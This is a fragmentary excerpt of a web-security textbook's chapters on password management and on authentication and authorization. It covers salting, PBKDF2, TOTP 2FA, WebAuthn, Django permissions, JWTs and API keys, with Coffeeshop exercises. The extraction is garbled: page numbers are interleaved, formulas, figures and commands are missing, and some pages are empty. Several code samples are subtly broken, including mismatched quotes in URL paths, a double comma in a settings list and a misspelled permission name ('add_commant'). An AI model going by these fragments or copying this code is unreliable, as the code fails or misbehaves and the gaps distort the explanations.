In a brute-force attack, the attacker systematically tries every password
until one matches. This can be done directly on the login page of an
application using a script (Python, Bash with Curl, etc.). The attacker
first tries a, then b, up to z, digits, uppercase and punctuation, then aa,
ab, etc., until all possible combinations have been tried. The number of
combinations will depend on the password length and the number of
different characters likely to be present.
Brute-force attacks are much faster when passwords are simple
words that exist in the dictionary, as only words need to be tried instead
of all alphanumeric combinations. As a comparison, there are over two
hundred billion combinations of up to eight lowercase letters. The full
Oxford English Dictionary contains around 270,000 words, so trying only
English words, even including obsolete ones, saves time by six orders of
magnitude. Cracking passwords this way is called a dictionary attack. Lists
of known passwords that were previously cracked (we mentioned the
RockYou attack in Chapter 1) can also be used.
We will return to this in Section 9.2 when we talk about password
policies.
To prevent brute-force attacks on the login page, it is a good idea to
artificially delay the response after a rapid series of failures from the same
IP address. As an added security, you may wish to block the user’s account
after further successive failures.
If the attacker can get a copy of your usernames and password hashes,
brute forcing becomes simpler as the attacker can perform it offline
without accessing your login page. Not only is this more discrete, evading
detection, but it is also faster because no network is involved and the
attacker can use multiple CPU cores and GPUs.
273
Chapter 9 Password Management
Attackers use software such as John the Ripper1 or THC Hydra.2 These
tools take a dictionary as input and try various common modifications
of each word such as case change and appending digits. Hackers can
write custom modification rules based on their experience of common
passwords. Therefore, adding digits or making small changes to words
does not prevent dictionary attacks.
Salted Hashes
To prevent rainbow table attacks, a salt is often used. This is a random
string that is appended to the plaintext password before creating the hash.
As it is random, it has to be stored alongside the username and hashed
password. The process is illustrated in Figure 9-2. A random salt, unique
per user, is created when the user registers. This and the password are
hashed, and the result is stored, along with the salt. When the user logs
1
www.openwall.com/john/
2
https://github.com/vanhauser-thc/thc-hydra
274
Chapter 9 Password Management
in, the salt is fetched from the database and used to rehash the entered
password. This is compared against the hashed password in the database.
Salting does not make brute forcing harder, other than making the
algorithm a little slower because it is hashing a longer string. As the salt is
stored along with the hash, both are usually compromised together. The
purpose of hashing is to make rainbow tables infeasible.
Rainbow tables rely on a password always mapping to the same hash.
Say a hacker wants to create a rainbow table. They enumerate all possible
one to eight character passwords and create the hash for each one. When
a site’s hashed password table is compromised, they look the hash up in
their table and find the plaintext password that corresponds to it.
If the compromised hash were created from a salt as well as the
plaintext password, the hash would not match anything in their table as
it was created before they knew the salt. To guarantee their table has a
match, they must create a hash of every password and salt combination. If
the salt is eight characters, they now need hashes of every combination of
1 + 8 = 9 characters for single-character passwords, 2 + 8 = 10 characters
for two-character passwords, and so on up to 8 + 8 = 16 characters for
eight-character passwords. There are now 4.5 × 1022 hashes to compute,
and to store them uncompressed and unindexed needs 2.1 × 1024 bytes.
275
Chapter 9 Password Management
276
Chapter 9 Password Management
is. The padding serves the purpose of flipping half the bits of K. The reason
for doing this is that HMAC is based on another secure PRF called NMAC,
which is a function of two keys:
The XORing function creates the two keys Kout and Kin from the one
key K. The security of NMAC was found not degraded by the two keys
being related.
If K is longer than B, it is first hashed using the same algorithm H.
The PBKDF2 password hashing algorithm is a function of a PRF, along
with the plaintext password P, a salt S, the number of iterations c, and the
key length dkLen. It produces a derived key DK or length dkLen octets:
277
Chapter 9 Password Management
PRF ( ⋅) = HMAC ( K , ⋅) .
3
https://cheatsheetseries.owasp.org/cheatsheets/
PasswordStorageCheatSheet.html
278
Chapter 9 Password Management
279
Chapter 9 Password Management
We saw earlier that there are around two hundred billion passwords
of one to eight lowercase letters. The actual number is 2.2 × 1011. If we
add uppercase letters and 12 special characters (for a total of 64 different
characters), that number increases to 2.8 × 1014 combinations. This
means passwords are over 1,000 times harder to brute force. If we add nine
character passwords, the number increases to 1.8 × 1016. This is 100,000
times harder to brute force than passwords with one to eight lowercase
letters. Passwords of eight characters used to be considered sufficient,
and in fact old hashing algorithms such as Unix crypt could only hash
passwords of no more than eight digits. With modern cracking speeds,
nine characters is more often considered a good minimum. The longer the
password is, the stronger it is.
Checks for password quality can be performed when the password is
created. Some common rules are as follows:
280
Chapter 9 Password Management
281
Chapter 9 Password Management
We saw in Section 6.1 that GET requests should not change state in
order to avoid CSRF attacks. The preceding GET request does not actually
change state: it takes a user to a page that prompts them for a new
password. The new password is sent in a POST request.
282
Chapter 9 Password Management
By including the last login timestamp and email address in the hashed
token, Django can invalidate it if the user has successfully logged in since
requesting it, or has changed their password. By default, the token expires
after 72 hours.
Note that Django does not (and cannot) decrypt the token. It rehashes
the user’s details and the timestamp in the first part of the token and
confirms the two hashes match.
283
Chapter 9 Password Management
export DBPASSWORD=mydatabasepwd
export SECRET_KEY=djangosecretkey
import os
...
SECRET_KEY = os.environ['SECRET_KEY']
. /secrets/config.env
The environment file should not go into Git so we can put an exclusion
in the .gitignore file. Simply config.env on a line by itself should suffice,
or prefixed with its subdirectory relative to the Git folder.
So that your developers know what format this file should be, create
another called config.env_template. Set the same variables in it, but
to dummy values. When a developer clones the repository, they should
copy config.env_template to config.env and change the values for each
variable. The same should be done in production (obviously with different
values). The config.env_template file can go into Git as it contains no real
passwords.
4
See www.vaultproject.io
284
Chapter 9 Password Management
9.5 Summary
Passwords are used to make applications secure, but they are only as
safe as the method in which they are stored. We looked at how hackers
crack passwords and at cryptographic techniques for mitigating this risk.
Passwords are also made less secure if users are free to choose easily
guessed ones, so we examined some rules for enforcing good passwords,
as well as how to provide users a secure means to reset their passwords
when they forget them.
Sometimes, passwords or keys need to be stored in an application, for
example, database passwords. We looked at a simple method to ensure
they don’t accidentally get stored in a source code repository.
Storing passwords securely is a necessary part of application design,
but by itself does not guarantee secure authentication. Accounts need
to be created, passwords need to be validated, and in some instances,
applications from different organizations have to trust each other. In the
next chapter, we will begin looking at how to build a secure authentication
mechanism.
285
CHAPTER 10
Authentication
and Authorization
In this chapter, we will look at options for authenticating users and
determining what permissions they have been given. The most common
authentication method is prompting for a username and password, so
we will begin with that. Other authentication methods include one-
time passwords and biometric data. We will look at how to implement
those also.
Once a user has authenticated, the application must determine what
permissions that user has. This is authorization, and we will look at various
methods for implementing it, including role-based authorization, JSON
web tokens, and API keys.
OAuth2 is a standardized protocol for authentication and
authorization. As it is a big topic, we will cover it in a separate chapter.
• One-time password
• Role-based authorization
• API keys
• OAuth2
288
Chapter 10 Authentication and Authorization
HTTP Authentication
The HTTP specification, in RFC 2617 [12] and RFC 7616 [1], defines HTTP
headers for authentication. These are supported by servers such as Apache
and Nginx as well as common browsers. The header
WWW-Authenticate
is sent by the server to ask the client to ask the user to authenticate. The
client prompts for a username and password and sends them back in a
new request with the header
Authorization
Basic Authentication
HTTP Basic Authentication is illustrated in Figure 10-1. The user requests a
page / that is protected by Basic authentication. The server responds with
401 Unauthorized and includes the header
instructing the client that it needs to provide credentials to access the page.
The realm is a name of the developer’s choosing. Credentials the user
provides will be valid for pages with the same realm.
289
Chapter 10 Authentication and Authorization
Base64(username:password)
<VirtualHost *:80>
ServerName example.com
DocumentRoot /var/www/html
<Directory "/var/www/html/protected">
290
Chapter 10 Authentication and Authorization
AuthType Basic
AuthName "ProtectedArea"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
</Directory>
</VirtualHost>
D
igest Authentication
HTTP defines a second type of authentication, called Digest, to mitigate
against disclosure of the password through a man-in-the-middle attack. It
achieves this by ensuring the password is not sent as plaintext.
The specification supports a number of options, making the syntax quite
elaborate. We will only look at one example, adapted from one given in RFC
7616. For more details, see RFC 7616 or Mozilla’s MDN Web Docs entry.1
1
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/
WWW-Authenticate
291
Chapter 10 Authentication and Authorization
292
Chapter 10 Authentication and Authorization
293
Chapter 10 Authentication and Authorization
Form-Based Authentication
Form-based authentication is performed by the application, not the web
server. When a user visits a page that requires authentication, and no
credentials have been provided, the application redirects the user to a
login page. The process is illustrated in Figure 10-2.
294
Chapter 10 Authentication and Authorization
295
Chapter 10 Authentication and Authorization
The next time the user requests a page, the session ID is sent to the
server in the Cookie header. The server validates it against its session table.
If it is valid, the user is taken directly to their requested page. If not, the
user is prompted to log in again.
path('accounts/', include('django.contrib.auth.urls')),
coffeeshopsite/coffeeshop/templates/registration/login.html
296
Chapter 10 Authentication and Authorization
@login_required
def basket(request):
cart = None
...
If the user visits the URL corresponding to this view (/basket/) and is
not already logged in (i.e., the request does not contain a valid session ID
as a cookie), the decorator redirects the user to the login page defined in
settings.py by LOGIN_URL, with /basket/ the value of the next parameter.
We can also check if the user is authenticated inside a view with the
following code:
if request.user.is_authenticated():
...
297
Chapter 10 Authentication and Authorization
10.3 One-Time Passwords
One-time passwords, or OTPs, become invalid once they have been used
once. After an OTP has been used to log into a server, the server no longer
accepts it as a valid password.
OTPs are often used together with another form of authentication,
such as username/password, as a two-factor authentication process,
though some applications use them as a sole factor.
There are two popular algorithms for generating OTPs. HMAC-Based
One-Time Passwords (HOTPs) and Time-Based One-Time Passwords
(TOTPs). There are also two ways of delivering them to the user. They
are either generated by the server and sent to a device registered to that
user, for example, by SMS to a mobile phone, or the user has a device that
can independently generate an OTP that matches the next one the server
expects. In the latter scenario, the OTP is never over a network.
When talking about OTPs, we talk about a token service and validation
service. The token service issues the OTP, and the validation service
validates it. If an application sends an OTP via SMS, and the user logs into
the same application with it, then both the token and validation services
are the same. However, a token service may be an application running on a
user’s smartphone, or a dedicated piece of hardware. In this situation, the
token and validation services are different.
298
Chapter 10 Authentication and Authorization
That is, the HOTP hash is a function of the symmetric key and the
current counter value. Truncd(h) is a function that truncates the hash to d
digits. Six digits is common for HOTPs. For SHA-1, d must be less than or
equal to ten.
By using HMAC, the OTP is cryptographically secure—an attacker
cannot reproduce it without the secret key.
Each time an HOTP is generated, the token service increments its
counter by one. Each time the validation service consumes it, it also
increments its counter.
It can happen that the validation service’s counter lags behind the
token service’s. This happens if tokens are generated but not used.
Therefore, a synchronization process can be added, allowing the validation
service to look ahead for a small number of counter values. If this fails
to achieve a matching HOTP, the two services must be resynchronized
manually.
299
Chapter 10 Authentication and Authorization
300
Chapter 10 Authentication and Authorization
G
oogle Authenticator
Google Authenticator is a token service application, available for Android
and iPhone, that implements the HOTP and TOTP protocols. It is released
under the Apache License 2.0 and available as open source on GitHub.5 It’s
original purpose was to enable users to log into their Google accounts using
2
www.cnbc.com/2019/09/06/hack-of-jack-dorseys-twitter-account-
highlights-sim-swapping-threat.html
3
See https://berlin.ccc.de/∼tobias/31c3-ss7-locate-track-manipulate.
pdf or https://youtu.be/-wu_pO5Z7Pk
4
See https://uk.pcmag.com/security/89214/phone-hack-drains-german-
bank-accounts
5
https://github.com/google/google-authenticator
301
Chapter 10 Authentication and Authorization
otpauth://type/label?parameters
The type is either hotp or totp. The label identifies the account for which
the secret key applies. As a user may use the same username for more than
one service, a convention is to prefix the username with the service name
and a colon, for example, Coffeeshop:bob or Google:[email protected].
The parameters include
• secret for the secret key (which should be
Base32-encoded)
• issuer for the name of the issuer (e.g., Coffeeshop)
6
See https://github.com/google/google-authenticator/wiki/
Key-Uri-Format
302
Chapter 10 Authentication and Authorization
An example URI is
otpauth://totp/Coffeeshop:bob?secret=JHFKDHF6RT3F2QM3&issuer=
Coffeeshop
Google Authenticator, and other token services using the same URI
format, can scan a QR code containing such a URI, saving the user from
having to type the data manually while also avoiding sending it over the
network.
303
Chapter 10 Authentication and Authorization
or
but we have already done this (with the phonenumberslite option) in the
Coffeeshop VM. For more details on installing django-two-factor-auth,
see its ReadTheDocs page.7
Next, we must add the two_factor app, and its underlying OTP applications,
to our site. Edit the settings.py file and add the apps to INSTALLED_APPS:
INSTALLED_APPS = [
...
'coffeeshop',
'sslserver',
# 2FA
'django_otp',
'django_otp.plugins.otp_static',
'django_otp.plugins.otp_totp',
'two_factor',
]
We must also add its middleware. Also in settings.py, edit the MIDDLEWARE
variable, adding the OTP middleware below AuthenticationMiddleware:
MIDDLEWARE = [
...
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django_otp.middleware.OTPMiddleware', # 2FA
...
]
7
https://django-two-factor-auth.readthedocs.io/en/1.13.1/
304
Chapter 10 Authentication and Authorization
We need a different login page for 2FA—the login process has to prompt the
user for the OTP as well as the username and password. The two_factor
app comes with a login page out of the box. Still in settings.py, change the
LOGIN_URL to point to it:
#LOGIN_URL = '/account/login/'
# 2FA
LOGIN_URL = 'two_factor:login'
...
from two_factor.urls import urlpatterns as tf_urls
urlpatterns = [
path(", include(tf_urls)),
path('admin/', admin.site.urls),
path(", include('coffeeshop.urls')),
path('account/', include('django.contrib.auth.urls')),
]
305
Chapter 10 Authentication and Authorization
By default, 2FA is disabled for all users. A user must enable it manually.
The two_factor app has views to do this, but we have to add a link to
them in the My Account page. Edit the template myaccount.html in
coffeeshopsite/coffeeshop/templates/coffeeshop and make the
following change (we are just adding one line):
...
</p>
<p><a href="{% url 'two_factor:profile' %}">Two-Factor
Authentication</a></p>
<p><a href="{% url 'changeemail' %}">Change email
address</a></p>
...
The two_factor and OTP apps add additional tables to the database. To
create them, perform a database migration with
If you find you have introduced bugs while editing the source code, you may
prefer to run a development instance so you can inspect the errors more
easily. To do this, run the command
306
Chapter 10 Authentication and Authorization
Let’s add 2FA to Bob’s account. First, log in as user bob. You will notice
the login page has changed, and that it has a warning bar at the top about
creating a _base.html template. In a production application, you would
create your own version of this template that matches your look and feel. If the
warning bothers you, there is an identical_base.html in
snippets/2fa/coffeeshop/templates/two_factor
coffeeshopsite/coffeeshop/templates/two_factor/_base.html
If you like, you can edit it further to match our look and feel (we have not).
Once you have logged in as Bob, click on the My Account link in the navigation
bar and then Two-Factor Authentication. This takes you to the wizard provided
by two_factor. If the logged-in user has not enabled 2FA, there is a button
to enable it. Click on this button. If you visit this page after enabling 2FA, it
displays a button to disable it.
Click through the next wizard screen and you will see a page with the QR code
to scan into Google Authenticator. It should look similar to Figure 10-3. Now
open Google Authenticator on your smartphone. If you haven’t used it before, it
will look like Figure 10-4. Click Scan a QR code and point it at the QR code in
the browser. If you have already used Google Authenticator, click on the round
plus button at the bottom instead (see Figure 10-5). Coffeeshop should register
to Google Authenticator, and you will see a TOTP that updates every few
seconds, as in Figure 10-5. Enter this code into the Token form field and click
Next. The two_factor app will also generate a TOTP, and so long as your VM
and smartphone clocks mostly match, 2FA will be enabled.
If you have problems, try updating your VM’s clock to match the one on your
smartphone. Note that you have to set it as UTC. To see the current time, enter
date
307
Chapter 10 Authentication and Authorization
date MMDDhhmm.ss
date 01020922.30
will set the time to 9:22:30 AM on 2 January (without changing the year).
The command
date 01021509
Now, log out and log in again. Coffeeshop will prompt you for a new TOTP. Get
this from Google Authenticator.
308
Chapter 10 Authentication and Authorization
309
Chapter 10 Authentication and Authorization
Disabling 2FA
To disable 2FA, follow the Two-Factor Authentication link again and click the
disable button. You can delete it from Google Authenticator by clicking the
three horizonal dots at the top of the app, then on the pencil icon, then on the
trash icon.
There is no need to clean up after this exercise. 2FA, whether enabled for a
user or not, will not interfere with any other exercise.
310
Chapter 10 Authentication and Authorization
As TOTPs are standardized, any application that generates them can be used
in place of Google Authenticator, so long as it can also scan a URI in the same
format. Alternatively, it is not hard to create one of your own by using the
formula in the RFC. This allows you as a developer to create a branded app
that matches your look and feel.
10.4 Authentication
with Public-Key Cryptography
We saw in Chapter 5 that the SSH protocol uses a public-private key pair
for authentication. TLS/SSL uses the same technique to authenticate
servers. The Web Authentication API, or WebAuthn, is a set of classes
implemented in JavaScript that can be used to add authentication to web
applications using a similar technique. The reason for being JavaScript is
to be able to use resources on the user’s device.
WebAuthn defines three roles:
311
Chapter 10 Authentication and Authorization
Registration
The registration process makes use of a private key embedded in the
Authenticator that has a certificate that is digitally signed by a trusted
authority. The algorithm uses the concept of a signed challenge:
312
Chapter 10 Authentication and Authorization
313
Chapter 10 Authentication and Authorization
The Client application sends the attestation to the server in Step 6, for
example, via a REST API call, containing the new public key. Finally, the server
validates this object to confirm its origin and saves the public key (Step 7).
A
uthentication
The authentication process is shown in Figure 10-7. As in the registration
process, after the Client requests that authentication begin in Step
1, the Server sends a challenge so that it can verify the identity of the
Authenticator when it responds (Step 2). The Client sends the server ID,
challenge, and origin of the request to the Authenticator in Step 3.
Next, the Authenticator asks the user if they are happy for the
credentials to be provided. If so, it fetches the corresponding private
key and verifies the identity of the user (again using a PIN, password, or
biometric data). This is shown as Step 4. It creates an assertion including
the challenge, server ID, and origin and signs it with the private key for
the account. It returns this to the Client in Step 5, which sends it on to the
Server in Step 6.
The server validates the assertion using the public key stored for the
account in Step 7. If it validates, it can sign the user in.
More information on the WebAuthn is available in the W3C
Recommendation [13]. There is also a good Mozilla MDN Web Docs
article8 and a practical guide by Vasyl Boroviak at itnext.io.9
The WebAuthn protocol is complex; however, much of it is handled
by the WebAuthn implementation itself, leaving relatively little for the
application developer to implement. We will look at an example using
biometric authentication in the next section.
8
https://developer.mozilla.org/en-US/docs/Web/API/
Web_Authentication_API
9
https://itnext.io/biometrics-fingerprint-auth-in-your-web-apps-
d5599522d0b3
314
Chapter 10 Authentication and Authorization
10.5 Biometric Authentication
Biometric authentication works by capturing features of a person’s body
other individuals do not have. For consumer applications, the commonly
used biometric measures are fingerprints and facial features. The most
common use is for reauthentication after a user has already signed in by
other means (such as a username and password), but they can also be
used for 2FA.
Biometric authentication is now widely used in smartphones, which
have dedicated scanners for this purpose. Developing biometric scanners
is not trivial because they must differentiate between a real person
and a facsimile of that person, such as a photo or mask. It would be
unacceptable, for example, if a website or mobile phone application could
be logged into simply by holding a photo of a user to the camera.
Developers of biometric scanners use the term liveness to describe
properties that differentiate a real person from a photo or mask.
For example, some fingerprint scanners use capacitive sensing that
detects electrical conductivity rather than capturing an optical image.
The differences in height fingerprints create results in differences in
conductivity.
315
Chapter 10 Authentication and Authorization
10
See www.wired.com/story/hackers-say-broke-face-id-security/
316
Chapter 10 Authentication and Authorization
317
Chapter 10 Authentication and Authorization
In Section 2.5, when we set up our VM, we forwarded port 8100 from
the VM to port 8100 on the host (or another port if that was already in
use). This means you can run the application in your Vagrant VM and
configure the DNS record to point to the host computer’s IP address, rather
than 10.50.0.2, the address of the Vagrant VM. We will be running the
application on port 8100, though that is easily changed if you want to run
on a different port.
Setting up a DNS server differs depending on your network and is
therefore beyond the scope of this book. Do not worry if you cannot meet
these requirements, though. The exercise is not mandatory, and you can still
benefit from simply reading the exercise and the downloaded source code.
BIOMETRIC 2FA
As discussed previously, the prerequisites for this exercise differ from the
others. You will need a computer (with or without the Coffeeshop VM) to run
the Server on and a device with fingerprint or face authentication to act as the
Client. If these are not the same device, the Client must be able to address the
Server by hostname. See the preceding text for more information.
We will begin by setting up the Server. For this exercise, it is not integrated
with the Coffeeshop application. The package we will use is not perfectly
modular, and there is boilerplate code to write, which detracts from
learning. Fortunately, it comes with an example application, which is almost
ready to use.
318
Chapter 10 Authentication and Authorization
At the time of writing, the latest version was 2.4.0. If, when doing this exercise,
you find the code differs greatly from what is written here, switch to version
2.4.0 with
For this exercise, it is best to start with a fresh Python installation. We will use
venv to create a virtual environment.
Once you have cloned the repository and created and activated your virtual
environment, edit the django-mfa2/example/examp file. Find the line
where the FIDO_SERVER_ID variable is set. Change the line to set the
variable to the hostname you will use to address the application on your
Client device. If your Client and Server are the same device, you can set it to
localhost. If they are different devices, you should set it to the hostname the
Client will address the Server with. For example, I am running the application
on my Mac that has a hostname mac1. I have created a record on my home
DNS server to give it the fully qualified domain name mac1.home. I would
therefore change the line to
FIDO_SERVER_ID=u"mac1.home"
319
Chapter 10 Authentication and Authorization
There is no need to enter a port number here, even if you are not going to use
the default one.
cd django-mfa2
pip3 install wheel
pip3 install -r requirements.txt
Next, run Django migrate. This creates a single table, User_keys, to store
the public keys returned by the Authenticator (as well as other keys, e.g., the
symmetric key for implementing TOTP):
cd django-mfa2/example
python3 manage.py migrate
cd django-mfa2/example
python3 manage.py createsuperuser
It doesn’t matter what username, email address, and password you choose, so
long as you remember the username and password for the next step. For this
example, we created a user called admin.
We are now ready to run the Django application. WebAuthn only works over
HTTPS. We could create and install a self-signed key, as we did in Section
5.5, and then add the application to Apache. However, since this is just for
experimentation, there is an easier way. The package django-sslserver
that we installed earlier adds TLS/SSL support, with a built-in self-signed key,
to Django’s development server. To start it, run the command
320
Chapter 10 Authentication and Authorization
The HTTPS server is now running on port 8100. If you prefer, you can use a
different port.
The next step is to open the application on the web browser of your Client
device. The URL you enter depends on where you are running the Server.
https://localhost:8100
Don’t forget to prefix it with https or the browser will default to http
and fail to load the page.
then the port will be the number assigned to host. In this example,
the address you would type into the browser is
https://localhost:9000
https://mac1.home:8100
321
Chapter 10 Authentication and Authorization
path('auth/login',auth.loginView,name="login"),
LOGIN_URL="/auth/login"
Log in using the superuser username and password you created earlier. So
far, MFA has not been set up, so you will be logged in and presented with the
screen shown in Figure 10-9 (defined in the home.html template). Now click
on the username in the top-right corner (in our case, this is admin) and select
Security from the pop-up menu. You will see a screen similar to Figure 10-10.
Click on the arrow on the Add Method button and select FIDO2 Security Key.
322
Chapter 10 Authentication and Authorization
mfa/templates/FIDO2/Add.html
There is a button in this page called Start that begins the registration with the
Authenticator. It calls the JavaScript function begin_reg(). Take a look at the
code. It makes a REST API call to fido2_begin_reg on the Server. This is
Step 1 in Figure 10-6. The Server’s response (Step 2) is a CBOR object, which
is decoded before constructing the WebAuthn call to the Authenticator.
The WebAuthn call to the Authenticator (Step 3 in the diagram) is the line
return navigator.credentials.create(options);
Click on the Start button to initiate this sequence. The biometric Authenticator
on your device will ask you for permission to use your fingerprint or face. If
you agree and proceed, it will use this to verify you, construct a public/private
key pair, and return the attestation object to the JavaScript client (Steps 4 and
5) in the diagram. Finally, on success, the Client makes the REST call fido2_
complete_reg to complete the registration (Step 7).
Now log out from the admin account and log in again. This time, after the
Server authenticates your username and password, the Client will request
permission to start the biometric authentication process, as in Figure 10-11.
The HTML template is
mfa/templates/recheck.html
and the JavaScript function is authen(). Step 1 in Figure 10-7 is the REST
API call to fido2_begin_auth in this function, and its response is Step 2.
The Client initiates authentication on the Authenticator with the WebAuthn
function:
return navigator.credentials.get(options)
323
Chapter 10 Authentication and Authorization
324
Chapter 10 Authentication and Authorization
325
Chapter 10 Authentication and Authorization
326
Chapter 10 Authentication and Authorization
327
Chapter 10 Authentication and Authorization
Click on the Authenticate button. Your device should prompt you for permission
to use your fingerprint or face for authentication. On an iPhone, you will have
two options: the first is blank, and the second is for Account from secret key.
Choose the first. The second option is for an external key device which we are
not using.
Your device will capture your fingerprint or face (Step 4) to verify your identity
and send back the signed assertion (Step 5). If this succeeds, the Client will
send the signed assertion to the Server with the fido2_complete_auth
REST API call. If validation of this on the Server is successful (Step 7), you will
be redirected to the home page.
deactivate
328
Chapter 10 Authentication and Authorization
10.6 Role-Based Authorization
We now turn our attention from authentication to authorization:
determining what a user has permission to do, once they have logged in.
In role-based authorization, permissions are associated with roles,
and users are assigned those roles. The role may be a property on the user
table, in which case the relationship between a role and user is one to one.
Alternatively, you may assign roles in a many-to-many relationship, as
shown in the relationship diagram in Figure 10-12.
Once a role model is defined, you can conditionally allow or disallow
functionality based on the logged-in user’s membership of a role. For
example, you can create a role called admin. If a logged-in user attempts to
access the administration pages of a web app, you can check if the user is a
member of the admin role and return 200 OK or 403 Forbidden accordingly.
Complex applications may need a more complex authorization
model. For example, you may have different levels of membership such
as Basic, Pro, and Enterprise. You may want those three groups have
access to different components of the application. It is error-prone to
assign permissions to individual users. Instead, we can assign users to
groups and associate permission with groups rather than users, as shown
in Figure 10-13. Using this model, you can change what roles a Pro user
has access to, for example, without having to create a new association for
every user.
329
Chapter 10 Authentication and Authorization
330
Chapter 10 Authentication and Authorization
appname.action_model
331
Chapter 10 Authentication and Authorization
def myview(request):
if (request.user.has_perm('coffeeshop.add_user')):
# do something
else:
# do something else
This works both when the user has the permission and when the user
is a member of a group that has the permission.
As an alternative, you can use the @permission_required decorator,
for example:
@permission_required('coffeeshop.add_user')
def myview(request):
# code only executed by a user with the permisison
...
If the view is called by a user who does not have the named
permission, they are redirected to the login page. You can change the login
page by adding it as a parameter:
@permission_required('coffeeshop.add_user', login_url='/
myloginpage/')
...
AUTHORIZATION IN DJANGO
Let’s change the Coffeeshop so that Alice can create comments on products
but Bob can’t. To do this, we must
332
Chapter 10 Authentication and Authorization
First, we’ll make the addcomment view only accessible to users with the
coffeeshop.add_comment permission (which Django automatically creates
from the Comment model in models.py). Open the file
coffeeshopsite/coffeeshop/views.py
Find the addcomment() function and add the decorator
@permission_required('coffeeshop.add_commant')
before it.
To remove the comment button from users who do not have permission, open
the file
coffeeshopsite/coffeeshop/templates/coffeeshop/product.html
<button type="submit" class="btn">Comment</button>
{% if perms.coffeeshop.add_comment %}
<button type="submit" class="btn">Comment</button>
{% endif %}
Log in as alice and visit a product page (e.g., click on Java). You should find
that the comments section is there but not the button to add a new one.
Now, we need to add the permission to Alice’s account. Log out, and then
visit the URL
http://10.50.0.2/admin/
333
Chapter 10 Authentication and Authorization
Figure 10-15. The Django Admin Console with the Users link
highlighted
Click Users (the link highlighted in the figure) and then click alice. Scroll
down to the User permissions section. Click coffeeshop | comment | Can
add comment and the right arrow to activate it for Alice. It should look like
Figure 10-16. Click the Save button at the bottom.
Now log out, log in again as alice, and visit a product page again. The
Comment button should be visible again.
334
Chapter 10 Authentication and Authorization
335
Chapter 10 Authentication and Authorization
{
"alg": "algorithm",
"typ": "JWT"
}
The algorithm value denotes the algorithm used for the signature.
HMAC with SHA (HS256, HS384, etc.) and RSA with SHA (RS256, RS384,
etc.) are common choices. The header is then Base64Url-encoded. This is
identical to Base64 encoding but with - in place of +, _ in place of /, and
=, which is the trailing padding character, either omitted or URL-encoded.
These changes are to make Base64 compatible with URL syntax.
The payload consists of claims, also as JSON. Claims are statements
about an entity such as a user. There are three types of claim:
1. Registered claims: Predefined claims defined in the
JWT standard. Common registered claims are as
follows:
• sub: The subject, such as the username
11
www.iana.org/assignments/jwt/jwt.xhtml
336
Chapter 10 Authentication and Authorization
An example payload is
{
"sub": "alice",
"exp": 1672531199,
"name": "Alice Adams",
"type": "member"
}
337
Chapter 10 Authentication and Authorization
Revoking JWTs
An advantage of JWTs is that the server does not have to query a database
to determine if a user is authorized. It does not even need to store session
state as all the data it needs to determine the user’s credentials are in the
JWT and signed by its own key. This makes them useful for single-page
web applications that make extensive use of API calls.
However, if no server-side state is stored, the JWT authorization cannot
be revoked. One solution to this is to make the expiry short, typically a few
minutes, and also issue a refresh token. This is also a JWT but with a longer
expiry, say, a month or more. The client sends the JWT authorization
token in requests to the server until it reaches expiry. When that happens,
it sends the refresh token instead. The token is stored in a special table
if it has been revoked. When the server receives the token from the
338
Chapter 10 Authentication and Authorization
We will revisit JWTs in the next chapter when we look at the OAuth2
protocol. We will also do an exercise with them.
339
Chapter 10 Authentication and Authorization
10.8 API Keys
API keys are a way of controlling access to APIs from clients. We saw in
Section 10.2 that form-based authentication with session IDs is inconvenient
for REST APIs as the client has to handle redirects to an HTML form if the
session ID has expired. An alternative is to always send a username and
password with each request. However, this means the password must be
stored by any application making the REST API calls. Not only is this risky
for the account owner, but it may grant more permissions than the client
actually needs. For example, we may want an application to have read-only
access to resources the user normally has read-write access to.
API keys are designed to address these issues. A user or developer
creates an API key for the application they want the REST API to access
on their behalf. The developer of the REST API can allow the user to select
from a number of roles, for example, read-only vs. read-write. To access the
API, the newly created key is sent instead of the user’s password.
Imagine a user, Alice, has an account with a service, weatherfor.com,
that provides an API to get weather forecasts. The API call
https://weatherfor.com/api/forecast/New+York
returns a JSON string with the current forecast for New York. Alice
wants to develop an application that uses this API. She visits weatherfor.
com, logs in, and goes to the page where she can create API keys.
The weatherfor.com site will ask Alice to enter an application name
which she can use later to refer to her new API key. It will create her a
cryptographically secure code. This may be a random string. Alternatively,
like Django session IDs, it may be information about the user and/or
application signed with a secret key.
The server displays the new API key so that Alice can copy it into her
application. It also stores it in a table associated with Alice’s ID. When Alice
uses the key in her application, weatherfor.com can determine which user
it belongs to and whether that user is authorized to access the API.
340
Chapter 10 Authentication and Authorization
341
Chapter 10 Authentication and Authorization
342
Chapter 10 Authentication and Authorization
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated',,
]
}
343
Chapter 10 Authentication and Authorization
REST_FRAMEWORK = {
"DEFAULT_PERMISSION_CLASSES": [
"rest_framework_api_key.permissions.HasAPIKey",
]
}
Alternatively, the authentication method can be set per view. For class-
based views, you can use the permission_classes class variable:
class MyView(APIView):
permission_classes = [HasAPIKey]
...
@api_view(['GET'])
@permission_classes([HasAPIKey])
def my_view(request):
...
Let’s add a new API call that will be accessed with an API key. To keep the
coding simple, we will use the ModelViewSet, like we already have for the
Address model. We will make a view set for the Product table. However, we
will use the ReadOnlyModelViewSet to only create the GET views.
The code for this exercise is in the snippets/apikeys directory.
344
Chapter 10 Authentication and Authorization
The first step is install the Django REST Framework API Key package with
However, this has already been done during the VM installation. We do need
to add it as an app. Edit the settings.py file and add it to the INSTALLED_
APPS directory variable:
INSTALLED_APPS = [
...
'rest_framework',
"rest_framework_api_key",
...
]
coffeeshopsite/coffeeshop/serializers.py
class ProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ['pk', 'name', 'description', 'unit_price']
Now edit
coffeeshopsite/coffeeshop/views.py
345
Chapter 10 Authentication and Authorization
and add the new view set. We will keep the default global permissions class
and set this view set to use HasAPIKey
coffeeshopsite/coffeeshop/urls.py
under
router.register(r'addresses', views.
AddressViewSet, basename="addresses")
router.register(r'products', views.ProductViewSet,
basename="products")
